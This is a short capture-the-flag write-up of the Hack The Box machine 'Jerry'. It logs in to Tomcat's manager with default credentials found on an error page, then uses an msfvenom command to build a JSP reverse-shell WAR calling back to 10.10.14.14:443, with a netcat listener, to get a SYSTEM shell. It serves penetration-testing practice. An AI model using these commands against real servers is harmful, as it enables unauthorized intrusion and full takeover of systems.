Jerry

2020-03-03 00:00:00 +0000

jerry

Jerry is another OSCP-like box from the HTB ‘retired’ archive. It’s one of the most straight forward boxes on the list.

Nmap

nmap -sV -Pn --min-rate 10000 10.10.10.95 |tee -a jerry.txt


PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

Not much appears to be going on! We have a Tomcat server on port 8080; these are usually straight forward to pwn.

Apache Tomcat/7.0.88

Clicking on the Manager App button we get a login popup, admin/admin fails, and we are directed to an error page.

tomcat-error

It discloses the example creds of tomcat/s3cret.

Trying these creds is successful and we are taken to a manager’s dashboard.


We need to upload an evil WAR file containing a reverse shell to gain access to the target.

The first step is to generate one with msfvenom.

msfvenom


msfvenom -p java/jsp_shell_reverse_tcp -f war lhost=10.10.14.14 lport=443 -o evil.war


Exploit

Time to upload the war file.

upload war

Once uploaded its time to execute the exploit. Make sure a netcat listener is set to 443 `nc -nlvp 443’

To pull the trigger, simply click on /evil in the list.

execute

we get our shell…

revshell

Its already a shell with System/Administrator privileges, so it’s no effort to pick up the flags.

:)